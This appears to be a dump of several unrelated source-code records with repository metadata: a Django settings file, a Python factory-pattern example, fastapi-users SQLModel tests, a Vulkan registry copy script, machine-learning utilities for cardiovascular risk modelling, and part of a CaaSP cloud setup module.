SERVER_URL = ""
API_URL = "%s/%s" % (SERVER_URL, "api")
LIVEWHALE_API_URL = "https://%s" % (SERVER_URL)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
ROOT_DIR = os.path.dirname(__file__)
ROOT_URL = "/djskeletor/"
ROOT_URLCONF = 'djskeletor.core.urls'
WSGI_APPLICATION = 'djskeletor.wsgi.application'
MEDIA_ROOT = ''
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATIC_ROOT = ''
STATIC_URL = "/static/"
STATICFILES_DIRS = ()
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
DATABASES = {
'default': {
'HOST': '127.0.0.1',
'PORT': '3306',
'NAME': 'django_djskeletor',
'ENGINE': 'django.db.backends.mysql',
#'ENGINE': 'django.db.backends.dummy',
'USER': '',
'PASSWORD': ''
},
}
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.formtools',
'django.contrib.humanize',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'djskeletor',
'djskeletor.core',
'djskeletor.myapp',
'djtools',
)
MIDDLEWARE_CLASSES = (
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.cache.FetchFromCacheMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# the following should be uncommented unless you are
# embedding your apps in iframes
#'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# template stuff
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
"/data2/django_projects/djskeletor/templates/",
"/data2/django_templates/djkorra/",
"/data2/django_templates/djcher/",
"/data2/django_templates/",
)
TEMPLATE_CONTEXT_PROCESSORS = (
"djtools.context_processors.sitevars",
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.media",
)
# caching
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
#'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#'LOCATION': '127.0.0.1:11211',
#'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
#'LOCATION': '/var/tmp/django_djskeletor_cache',
#'TIMEOUT': 60*20,
#'KEY_PREFIX': "DJSKELETOR_",
#'OPTIONS': {
# 'MAX_ENTRIES': 80000,
#}
}
}
CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True
# LDAP Constants
LDAP_SERVER = ''
LDAP_SERVER_PWM = ''
LDAP_PORT = ''
LDAP_PORT_PWM = ''
LDAP_PROTOCOL = ""
LDAP_PROTOCOL_PWM = ""
LDAP_BASE = ""
LDAP_USER = ""
LDAP_PASS = ""
LDAP_EMAIL_DOMAIN = ""
LDAP_OBJECT_CLASS = ""
LDAP_OBJECT_CLASS_LIST = []
LDAP_GROUPS = {}
LDAP_RETURN = []
LDAP_RETURN_PWM = []
LDAP_ID_ATTR = ""
LDAP_CHALLENGE_ATTR = ""
# auth backends
AUTHENTICATION_BACKENDS = (
'djauth.ldapBackend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_URL = '/djskeletor/accounts/login/'
LOGIN_REDIRECT_URL = '/djskeletor/'
USE_X_FORWARDED_HOST = True
#SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
SESSION_COOKIE_DOMAIN=".carthage.edu"
SESSION_COOKIE_NAME ='django_djskeletor_cookie'
SESSION_COOKIE_AGE = 86400
# SMTP settings
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_FAIL_SILENTLY = False
DEFAULT_FROM_EMAIL = ''
SERVER_EMAIL = ''
SERVER_MAIL=''
# logging
LOG_FILEPATH = os.path.join(os.path.dirname(__file__), "logs/")
LOG_FILENAME = LOG_FILEPATH + "debug.log"
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level':'DEBUG',
'class':'django.utils.log.NullHandler',
},
'logfile': {
'level':'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filename': LOG_FILENAME,
'maxBytes': 50000,
'backupCount': 2,
'formatter': 'standard',
},
'console':{
'level':'INFO',
'class':'logging.StreamHandler',
'formatter': 'standard'
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'include_html': True,
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'djskeletor': {
'handlers':['logfile'],
'propagate': True,
'level':'DEBUG',
},
'django': {
'handlers':['console'],
'propagate': True,
'level':'WARN',
},
'django.db.backends': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| 2.046875 | 2 |
records/12-09/ffff.py | AaronYang2333/CSCI_570 | 36 | 5022 | <filename>records/12-09/ffff.py<gh_stars>10-100
__author__ = '<NAME>'
__email__ = '<EMAIL>'
__date__ = '12/9/2020 4:18 PM'
from abc import abstractmethod
class Product(object):
@abstractmethod
def setMsg(self, msg="default info"):
self.msg = msg
@abstractmethod
def info(self):
print(self.msg)
class DefaultObj(Product):
def __init__(self):
super().setMsg()
class Factory(object):
@abstractmethod
def produce(self):
return DefaultObj()
class PC(Product):
def __init__(self):
self.setMsg('pc info')
class LAPTOP(Product):
def __init__(self):
self.setMsg('laptop info')
class PCFactory(Factory):
def produce(self):
return PC()
class LAPTOPFactory(Factory):
def produce(self):
return LAPTOP()
if __name__ == '__main__':
ss = Factory().produce()
pc = PCFactory().produce()
laptop = LAPTOPFactory().produce()
pc.info()
laptop.info()
ss.info()
| 3.40625 | 3 |
tests/test_users.py | fastapi-users/fastapi-users-db-sqlmodel | 18 | 5023 | <gh_stars>10-100
import uuid
from typing import AsyncGenerator
import pytest
from sqlalchemy import exc
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine
from sqlalchemy.orm import sessionmaker
from sqlmodel import Session, SQLModel, create_engine
from fastapi_users_db_sqlmodel import (
NotSetOAuthAccountTableError,
SQLModelUserDatabase,
SQLModelUserDatabaseAsync,
)
from tests.conftest import OAuthAccount, UserDB, UserDBOAuth
safe_uuid = uuid.UUID("a9089e5d-2642-406d-a7c0-cbc641aca0ec")
async def init_sync_session(url: str) -> AsyncGenerator[Session, None]:
engine = create_engine(url, connect_args={"check_same_thread": False})
SQLModel.metadata.create_all(engine)
with Session(engine) as session:
yield session
SQLModel.metadata.drop_all(engine)
async def init_async_session(url: str) -> AsyncGenerator[AsyncSession, None]:
engine = create_async_engine(url, connect_args={"check_same_thread": False})
make_session = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)
async with engine.begin() as conn:
await conn.run_sync(SQLModel.metadata.create_all)
async with make_session() as session:
yield session
await conn.run_sync(SQLModel.metadata.drop_all)
@pytest.fixture(
params=[
(init_sync_session, "sqlite:///./test-sqlmodel-user.db", SQLModelUserDatabase),
(
init_async_session,
"sqlite+aiosqlite:///./test-sqlmodel-user.db",
SQLModelUserDatabaseAsync,
),
],
ids=["sync", "async"],
)
async def sqlmodel_user_db(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
create_session = request.param[0]
database_url = request.param[1]
database_class = request.param[2]
async for session in create_session(database_url):
yield database_class(UserDB, session)
@pytest.fixture(
params=[
(
init_sync_session,
"sqlite:///./test-sqlmodel-user-oauth.db",
SQLModelUserDatabase,
),
(
init_async_session,
"sqlite+aiosqlite:///./test-sqlmodel-user-oauth.db",
SQLModelUserDatabaseAsync,
),
],
ids=["sync", "async"],
)
async def sqlmodel_user_db_oauth(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
create_session = request.param[0]
database_url = request.param[1]
database_class = request.param[2]
async for session in create_session(database_url):
yield database_class(UserDBOAuth, session, OAuthAccount)
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries(sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]):
user = UserDB(
id=safe_uuid,
email="<EMAIL>",
hashed_password="<PASSWORD>",
)
# Create
user_db = await sqlmodel_user_db.create(user)
assert user_db.id is not None
assert user_db.is_active is True
assert user_db.is_superuser is False
assert user_db.email == user.email
# Update
user_db.is_superuser = True
await sqlmodel_user_db.update(user_db)
# Get by id
id_user = await sqlmodel_user_db.get(user.id)
assert id_user is not None
assert id_user.id == user_db.id
assert id_user.is_superuser is True
# Get by email
email_user = await sqlmodel_user_db.get_by_email(str(user.email))
assert email_user is not None
assert email_user.id == user_db.id
# Get by uppercased email
email_user = await sqlmodel_user_db.get_by_email("<EMAIL>")
assert email_user is not None
assert email_user.id == user_db.id
# Unknown user
unknown_user = await sqlmodel_user_db.get_by_email("<EMAIL>")
assert unknown_user is None
# Delete user
await sqlmodel_user_db.delete(user)
deleted_user = await sqlmodel_user_db.get(user.id)
assert deleted_user is None
# Exception when trying to get by OAuth account
with pytest.raises(NotSetOAuthAccountTableError):
await sqlmodel_user_db.get_by_oauth_account("foo", "bar")
@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_existing_email(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
user = UserDB(
id=safe_uuid,
email="<EMAIL>",
hashed_password="<PASSWORD>",
)
await sqlmodel_user_db.create(user)
with pytest.raises(exc.IntegrityError):
await sqlmodel_user_db.create(
UserDB(id=safe_uuid, email=user.email, hashed_password="<PASSWORD>")
)
@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_non_nullable_fields(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
with pytest.raises(exc.IntegrityError):
wrong_user = UserDB(
id=safe_uuid, email="<EMAIL>", hashed_password="<PASSWORD>"
)
wrong_user.email = None # type: ignore
await sqlmodel_user_db.create(wrong_user)
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_custom_fields(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount],
):
"""It should output custom fields in query result."""
user = UserDB(
id=safe_uuid,
email="<EMAIL>",
hashed_password="<PASSWORD>",
first_name="Lancelot",
)
await sqlmodel_user_db.create(user)
id_user = await sqlmodel_user_db.get(user.id)
assert id_user is not None
assert id_user.id == user.id
assert id_user.first_name == user.first_name
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_oauth(
sqlmodel_user_db_oauth: SQLModelUserDatabase[UserDBOAuth, OAuthAccount],
oauth_account1,
oauth_account2,
):
user = UserDBOAuth(
id=safe_uuid,
email="<EMAIL>",
hashed_password="<PASSWORD>",
oauth_accounts=[oauth_account1, oauth_account2],
)
# Create
user_db = await sqlmodel_user_db_oauth.create(user)
assert user_db.id is not None
assert hasattr(user_db, "oauth_accounts")
assert len(user_db.oauth_accounts) == 2
# Update
user_db.oauth_accounts[0].access_token = "NEW_TOKEN"
await sqlmodel_user_db_oauth.update(user_db)
# Get by id
id_user = await sqlmodel_user_db_oauth.get(user.id)
assert id_user is not None
assert id_user.id == user_db.id
assert id_user.oauth_accounts[0].access_token == "NEW_TOKEN"
# Get by email
email_user = await sqlmodel_user_db_oauth.get_by_email(str(user.email))
assert email_user is not None
assert email_user.id == user_db.id
assert len(email_user.oauth_accounts) == 2
# Get by OAuth account
oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account(
oauth_account1.oauth_name, oauth_account1.account_id
)
assert oauth_user is not None
assert oauth_user.id == user.id
assert len(oauth_user.oauth_accounts) == 2
# Unknown OAuth account
unknown_oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account("foo", "bar")
assert unknown_oauth_user is None
| 2.125 | 2 |
copy_reg.py | rtbo/vkdgen | 2 | 5024 | <filename>copy_reg.py
#! /usr/bin/env python3
import os
from os import path
root_dir = path.dirname(path.realpath(__file__))
local_reg_dir = path.join(root_dir, 'registry')
os.makedirs(local_reg_dir, exist_ok=True)
def copy_reg(reg_dir, files):
import shutil
for f in files:
file_path = path.join(reg_dir, f)
if not path.isfile(file_path):
raise RuntimeError(file_path + ' could not be found')
shutil.copy2(file_path, path.join(local_reg_dir, path.basename(f)))
vk_files = [ 'registry/vk.xml', 'registry/reg.py', 'registry/generator.py' ]
copy_reg(path.join(root_dir, 'Vulkan-Headers'), vk_files)
| 2.6875 | 3 |
utils.py | atward424/ASCVD_ML | 1 | 5025 | <gh_stars>1-10
import numpy as np
import pandas as pd
import scipy.stats as st
#from medical_ML import Experiment
import matplotlib.pyplot as plt
import xgboost as xgb
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.dummy import DummyClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression, Lasso
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn import linear_model
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.dummy import DummyRegressor
def split_cohort(datafile, to_exclude = None, test_ind_col = None, drop = 'some'):
""" Load and clean the dataset
"""
if isinstance(datafile, str):
data = pd.read_csv(datafile)
else:
data = datafile
test_data = None
if to_exclude is not None:
for k in to_exclude.keys():
if k == 'race':
data = data[data[k].isin(to_exclude[k])]
elif k == 'agebl':
data = data[data[k] >= to_exclude[k]]
elif to_exclude[k]:
data = data[data[k] == 0]
if drop == 'some':
data = data.drop(k, axis = 1)
if drop == 'all':
if (k != 'race') & (k != 'agebl'):
data = data.drop(k, axis = 1)
# self.data = self.data[self.data['year'] <= 2010]
# self.data = self.data.drop(['year'], axis = 1)
if test_ind_col is not None:
test_data = data[data[test_ind_col] == 1]
test_data = test_data.drop(test_ind_col, axis = 1)
data = data[data[test_ind_col] == 0]
data = data.drop(test_ind_col, axis = 1)
return(data, test_data)
def calc_auc_conf_interval(AUC, N1, N2, ci = 0.95):
# from https://ncss-wpengine.netdna-ssl.com/wp-content/themes/ncss/pdf/Procedures/PASS/Confidence_Intervals_for_the_Area_Under_an_ROC_Curve.pdf
zsc = st.norm.ppf(1 - (1-ci)/2.)
q1 = AUC / (2 - AUC)
q2 = (2 * AUC * AUC) / (1 + AUC)
numerator = AUC * (1 - AUC) + (N1 - 1) * (q1 - AUC * AUC) + (N2 - 1) * (q2 - AUC * AUC)
denom = N1 * N2
se_AUC = np.sqrt(numerator / denom)
return (se_AUC, AUC - zsc * se_AUC, AUC, AUC + zsc * se_AUC)
def load_models_and_parameters_default():
models_and_parameters = {
'dummy_reg': (DummyRegressor(),
{"strategy": ["mean"]}),
'lasso_reg': (linear_model.Lasso(),
{'alpha': np.arange(0.1, 1.0, 0.01),
'max_iter': [10000]}),
'rf_reg': (RandomForestRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'gbm_reg': (GradientBoostingRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
# 'loss': ['ls', 'lad'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'dummy': (DummyClassifier(),
{"strategy": ["most_frequent"]}),
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.01,0.1, 1]}), #, "balanced"
# "C":[0.1]}), #, "balanced"
'logreg': (LogisticRegression(),
{}), #, "balanced"
# "C":[0.1]}), #, "balanced"
'lasso': (Lasso(),
{"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05),
'max_iter': [10000]}),
# 'lasso2': (LogisticRegression(penalty = 'l1'),
# {"C":[0.001, 0.01,0.1, 1]}),
'lasso2': (LogisticRegression(penalty = 'l1',solver ='saga'),
{}),
'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
{"C":[0.001, 0.01,0.1, 1],
"l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
'dt': (DecisionTreeClassifier(),
{"criterion": ["entropy"],
# "max_depth": [2, 3, 4, 5, 10, 20], # None
"max_depth": [1, 2, 3, 4], # None
"splitter": ["best", "random"],
"min_samples_split": [2, 5, 10],
"min_samples_leaf": [3, 5, 10, 15, 20],
"random_state": [817263]}),
'svm': (SVC(),
{'C': [ 1],
'kernel': ['linear']}), #'poly', 'rbf'
'knn': (KNeighborsClassifier(),
{'n_neighbors': [2, 3, 5, 10, 20, 50],
'weights': ['uniform', 'distance']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [3, 5, 10],
# 'max_features': ['auto', 'sqrt', 'log2']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [50, 100, 501, 1000],
# 'max_depth': [3,5,7],
# "min_samples_split": [2, 5],
# 'max_features': ['auto', 0.5],
# "class_weight": [None, "balanced"]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [5],
# "min_samples_split": [5],
# 'max_features': ['auto'],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [ 501, 1000, 2000, 4000],
# 'max_depth': [5, 7, 9, 11, 13],
# "min_samples_split": [2],
# 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [200, 500, 1000],
# 'max_depth': [4, 6, 8, 10],
# "min_samples_split": [2, 10],
# 'max_features': [0.25, 0.5],
# "class_weight": [None]}),
'rf': (RandomForestClassifier(),
{'n_estimators': [800],
'max_depth': [8],
"min_samples_split": [10],
'max_features': [0.25],
"class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [400, 500, 600],
# 'max_depth': [7,8,9],
# "min_samples_split": [5,10],
# 'max_features': [0.25, 0.5, ]}),
# 'rf': (RandomForestClassifier(),
# {}),
'xgb': (xgb.XGBClassifier(),
{}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [600],
# 'max_depth': [9],
# "min_samples_split": [10],
# 'max_features': [0.25]}),
#
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [100,500],
# 'max_depth': [3,4,5],
# 'learning_rate': [0.1, 0.3],
# "reg_alpha": [0, 1],
# "reg_lambda": [0.1, 1]}),
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [500],
# 'max_depth': [4],
# 'learning_rate': [0.1],
# "reg_alpha": [0, 10],
# "reg_lambda": [0.1, 10]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [200, 300],
# 'learning_rate': [0.01],
# 'max_depth': [3,4,5],
# 'subsample': [0.35, 0.7],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400],
# 'learning_rate': [0.01],
# 'max_depth': [5],
# 'subsample': [0.75],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [300, 400, 500],
# 'learning_rate': [0.01, 0.003, 0.4],
# 'max_depth': [5, 6, 7],
# 'subsample': [0.85, 1],
# 'max_features': [0.25, 0.5]}),
'gbm': (GradientBoostingClassifier(),
{}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 300, 500, 1000, 2000,
# 4000],
# 'max_depth': [2, 3, 4, 5, 6, 7,
# 9],
# 'subsample': [0.75,
# 1],
# 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
# 1.0]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 400, 800],
# 'learning_rate': [0.03, 0.01, 0.001],
# 'max_depth': [4,5,6,8],
# 'subsample': [0.85],
# 'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400, 600],
# 'learning_rate': [0.01],
# 'max_depth': [5, 6],
# 'subsample': [0.85],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [25, 50, 75, 100, 200],
# 'max_depth': [2,3,5],
# 'subsample': [0.25, 0.5, 0.75, 1],
# 'max_features': [None, 'sqrt', 'log2', 0.5]}),
}
return(models_and_parameters)
def load_models_and_parameters():
models_and_parameters = {
'dummy_reg': (DummyRegressor(),
{"strategy": ["mean"]}),
'lasso_reg': (linear_model.Lasso(),
{'alpha': np.arange(0.1, 1.0, 0.01),
'max_iter': [10000]}),
'rf_reg': (RandomForestRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'gbm_reg': (GradientBoostingRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
# 'loss': ['ls', 'lad'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'dummy': (DummyClassifier(),
{"strategy": ["most_frequent"]}),
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
'logreg': (LogisticRegression(),
{"class_weight": [None],
"C":[0.01,0.1, 1]}), #, "balanced"
# "C":[0.1]}), #, "balanced"
# 'logreg': (LogisticRegression(),
# {}), #, "balanced"
# # "C":[0.1]}), #, "balanced"
'lasso': (Lasso(),
{"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05),
'max_iter': [10000]}),
'lasso2': (LogisticRegression(penalty = 'l1', solver ='saga'),
{"C":[0.001, 0.01,0.1, 1]}),
# 'lasso2': (LogisticRegression(penalty = 'l1'),
# {}),
'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
{"C":[0.001, 0.01,0.1, 1],
"l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
'dt': (DecisionTreeClassifier(),
{"criterion": ["entropy"],
# "max_depth": [2, 3, 4, 5, 10, 20], # None
"max_depth": [1, 2, 3, 4], # None
"splitter": ["best", "random"],
"min_samples_split": [2, 5, 10],
"min_samples_leaf": [3, 5, 10, 15, 20],
"random_state": [817263]}),
'svm': (SVC(),
{'C': [ 1],
'kernel': ['linear']}), #'poly', 'rbf'
'knn': (KNeighborsClassifier(),
{'n_neighbors': [2, 3, 5, 10, 20, 50],
'weights': ['uniform', 'distance']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [3, 5, 10],
# 'max_features': ['auto', 'sqrt', 'log2']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [50, 100, 501, 1000],
# 'max_depth': [3,5,7],
# "min_samples_split": [2, 5],
# 'max_features': ['auto', 0.5],
# "class_weight": [None, "balanced"]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [5],
# "min_samples_split": [5],
# 'max_features': ['auto'],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [ 501, 1000, 2000, 4000],
# 'max_depth': [5, 7, 9, 11, 13],
# "min_samples_split": [2],
# 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [200, 500, 1000],
# 'max_depth': [4, 6, 8, 10],
# "min_samples_split": [2, 10],
# 'max_features': [0.25, 0.5],
# "class_weight": [None]}),
'rf': (RandomForestClassifier(),
{'n_estimators': [500, 1000],
'max_depth': [8],
"min_samples_split": [10],
'max_features': [0.25],
"class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [400, 500, 600],
# 'max_depth': [7,8,9],
# "min_samples_split": [5,10],
# 'max_features': [0.25, 0.5, ]}),
# 'rf': (RandomForestClassifier(),
# {}),
# 'xgb': (xgb.XGBClassifier(),
# {}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [600],
# 'max_depth': [9],
# "min_samples_split": [10],
# 'max_features': [0.25]}),
#
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [100,500],
# 'max_depth': [3,4,5],
# 'learning_rate': [0.1, 0.3],
# "reg_alpha": [0, 1],
# "reg_lambda": [0.1, 1]}),
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [500],
# 'max_depth': [4],
# 'learning_rate': [0.1],
# "reg_alpha": [0, 10],
# "reg_lambda": [0.1, 10]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [200, 300],
# 'learning_rate': [0.01],
# 'max_depth': [3,4,5],
# 'subsample': [0.35, 0.7],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400],
# 'learning_rate': [0.01],
# 'max_depth': [5],
# 'subsample': [0.75],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [300, 400, 500],
# 'learning_rate': [0.01, 0.003, 0.4],
# 'max_depth': [5, 6, 7],
# 'subsample': [0.85, 1],
# 'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 300, 500, 1000, 2000,
# 4000],
# 'max_depth': [2, 3, 4, 5, 6, 7,
# 9],
# 'subsample': [0.75,
# 1],
# 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
# 1.0]}),
'gbm': (GradientBoostingClassifier(),
{'n_estimators': [100, 200, 400, 800],
'learning_rate': [0.03, 0.01, 0.001],
'max_depth': [4,5,6,8],
'subsample': [0.85],
'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400, 600],
# 'learning_rate': [0.01],
# 'max_depth': [5, 6],
# 'subsample': [0.85],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [25, 50, 75, 100, 200],
# 'max_depth': [2,3,5],
# 'subsample': [0.25, 0.5, 0.75, 1],
# 'max_features': [None, 'sqrt', 'log2', 0.5]}),
}
return(models_and_parameters)
def calc_metrics(y_true, y_pred, return_all = False):
res_df = pd.DataFrame({'y_true' : y_true,
'y_pred': y_pred}, columns = ['y_pred', 'y_true'])
res_df = res_df.sort_values(by = 'y_pred')
res_df['TN'] = (res_df.y_true == 0).cumsum()
res_df['FN'] = (res_df.y_true == 1).cumsum()
if return_all == False:
res_df = pd.concat([pd.DataFrame({'y_true' : -1,
'y_pred': -1,
"TN": 0,
"FN":0},
index = [-1],
columns = ['y_pred', 'y_true', 'TN', "FN"]),
res_df], axis = 0)
res_df['TP'] = (res_df.y_true == 1).sum() - res_df['FN']
res_df['FP'] = (res_df.y_true == 0).sum() - res_df['TN']
res_df['sens'] = res_df.TP / (res_df.TP + res_df.FN)
res_df['spec'] = res_df.TN / (res_df.TN + res_df.FP)
res_df['PPV'] = res_df.TP / (res_df.TP + res_df.FP)
res_df['accuracy'] = (res_df.TP + res_df.TN) / (res_df.shape[0])
res_df['f1_score'] = 2 * res_df.PPV * res_df.sens / (res_df.PPV + res_df.sens)
res_df['youdens_index'] = res_df.sens + res_df.spec - 1
# remove predictions which represent non-separable decision points (i.e., y_pred is equal)
if return_all == False:
res_df = res_df[(res_df.y_pred.duplicated('last') == False)]
return(res_df)
def set_up_plot():
# plt.grid(True, 'major', color = 'w', linewidth = 0.7)
plt.grid(True, 'major', color = '0.85', linewidth = 0.7)
plt.grid(True, 'minor', color = "0.92", linestyle = '-', linewidth = 0.7)
ax = plt.gca()
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
ax.set_axisbelow(True)
# ax.patch.set_facecolor("0.85")
def train_val(RESULT_DIR, alldata, models, label = 'Label',
cv = 5,
score_name = "AUC",
to_exclude = None,
test_ind_col = None, oversample_rate = 1,
imputer = 'iterative', add_missing_flags = True):
from medical_ML import Experiment
print('\n\n' + 'STARTING EXPERIMENT FOR ' + RESULT_DIR + '\n\n')
expt = Experiment(alldata, label = label,
to_exclude = to_exclude,
test_ind_col = test_ind_col, drop = 'all',
result_dir = RESULT_DIR)
expt.predict_models_from_groups(0, models, cv=cv, score_name=score_name, mode='classification',
oversample_rate = oversample_rate,
imputer = imputer, add_missing_flags = add_missing_flags)
expt.save_and_plot_results(models,
cv = cv, test = False)
return(expt) | 2.6875 | 3 |
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py | hwoarang/caasp-container-manifests | 5 | 5026 | <gh_stars>1-10
import json
import logging
import re
import susepubliccloudinfoclient.infoserverrequests as ifsrequest
import yaml
import sys
RELEASE_DATE = re.compile('^.*-v(\d{8})-*.*')
def get_caasp_release_version():
"""Return the version from os-release"""
os_release = open('/etc/os-release', 'r').readlines()
for entry in os_release:
if entry.startswith('VERSION_ID'):
version_id = entry.split('=')[-1].strip()
# We assume that os-release will always have '"' as
# version delimiters
version = version_id.strip('"\'')
logging.info('Release version: "%s"' % version)
return version
def get_cloud_config_path():
"""Return the path for the cloud configuration file"""
return '/etc/salt/pillar/cloud.sls'
def get_from_config(config_option):
"""Get the value for the given config option"""
# Expected low usage of this method, re-read the file on an as needed
# basis. If this turns out to be an issue cache the content
config_path = get_cloud_config_path()
